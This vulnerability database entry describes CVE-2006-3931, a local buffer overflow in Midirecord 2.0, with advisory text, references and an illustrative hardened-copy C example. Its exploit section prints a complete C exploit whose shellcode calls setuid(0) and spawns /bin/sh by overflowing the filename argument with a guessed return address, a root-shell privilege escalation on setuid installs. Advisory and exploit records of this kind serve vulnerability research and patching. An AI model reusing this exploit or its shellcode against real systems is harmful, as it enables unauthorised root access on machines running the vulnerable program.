Tuomas Airaksinen Midirecord daemon function local buffer overflow vulnerability

Vulnerability ID: 1110692    Vulnerability type: buffer overflow
Published: 2006-07-27    Updated: 2006-08-01
CVE number: CVE-2006-3931    CNNVD-ID: CNNVD-200607-512
Platform: Linux    CVSS score: 4.6
|Vulnerability sources
https://www.exploit-db.com/exploits/28288
https://cxsecurity.com/issue/WLB-2006080012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-512
|Vulnerability details
A buffer overflow exists in the daemon function of Tuomas Airaksinen Midirecord 2.0. A local user can execute arbitrary code via a long command-line argument (the filename). Note: if Midirecord is not installed setuid, this issue may not constitute a vulnerability.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/19190/info

Midirecord is prone to a local buffer-overflow vulnerability because it fails to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.

An attacker can exploit this issue to execute arbitrary code in the context of the victim running the affected application. 

Version 2.0 is vulnerable to this issue; other versions may also be affected.

/* Successful Exploit in Ubuntu Breezy */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225
#define ALIGNMENT 1

int main(int argc, char **argv)
{
        /* payload: setuid(0) followed by execve of /bin/sh */
        char shellcode[] =
                "\x6a\x17\x58\x31\xdb\xcd\x80"
                "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";

        if (argc < 2) {
                fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);
                return 0;
        }

        /* the payload is handed to the target through its environment */
        char *env[] = {shellcode, NULL};
        char buf[BUFSIZE];
        int i;
        int *ap = (int *)(buf + ALIGNMENT);
        /* guessed stack address of the payload inside the target's environment */
        int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

        /* the over-long filename argument is filled with that address */
        for (i = 0; i < BUFSIZE - 4; i += 4)
                *ap++ = ret;
        execle(argv[1], "/dev/midi1", buf, NULL, env);

        return 0;
}
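As an added example (not midirecord's own source, which this page does not include), the unbounded-copy pattern the advisory describes sits beside a bounded version that refuses over-long filenames before copying; the buffer size DEVNAME_MAX, the function names and the test helper are assumptions made for illustration.

```c
#include <string.h>
#include <errno.h>

/* Assumed buffer size for illustration; midirecord's real size is not on this page. */
#define DEVNAME_MAX 64

/* Unsafe pattern (hypothetical): the argv-supplied name is copied into a
 * fixed stack buffer with no bound, so a name of DEVNAME_MAX bytes or more
 * overwrites what follows the buffer, including the saved return address. */
int open_device_unsafe(const char *name)
{
    char path[DEVNAME_MAX];
    strcpy(path, name);            /* no length check: overflows on long input */
    return (int)strlen(path);
}

/* Hardened form: measure with an explicit bound, refuse anything that
 * would not fit together with its terminator, and only then copy.
 * Returns 0 on success, -1 with errno set on rejection. */
int open_device_safe(const char *name, char *out, size_t outsz)
{
    size_t n;
    if (name == NULL || out == NULL || outsz == 0) {
        errno = EINVAL;
        return -1;
    }
    for (n = 0; n < outsz && name[n] != '\0'; n++)
        ;                          /* bounded scan: never reads past outsz */
    if (n >= outsz) {              /* no room for the NUL terminator */
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(out, name, n);
    out[n] = '\0';
    return 0;
}

/* Exercise the hardened path with a constructed name of 'len' bytes of 'A'. */
int try_name_of_length(size_t len)
{
    char name[512];
    char out[DEVNAME_MAX];
    if (len > sizeof name - 1)
        len = sizeof name - 1;
    memset(name, 'A', len);
    name[len] = '\0';
    return open_device_safe(name, out, sizeof out);
}
```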
|References

Source: BID
Name: 19190
Link: http://www.securityfocus.com/bid/19190
Source: BUGTRAQ
Name: 20060725 [ECHO_ADV_41$2006] Buffer Overflow in Midirecord 2
Link: http://www.securityfocus.com/archive/1/archive/1/441204/100/0/threaded
Source: MISC
Link: http://advisories.echo.or.id/adv/adv41-theday-2006.txt
Source: XF
Name: midirecord-filename-bo (28047)
Link: http://xforce.iss.net/xforce/xfdb/28047
Source: SREASON
Name: 1303
Link: http://securityreason.com/securityalert/1303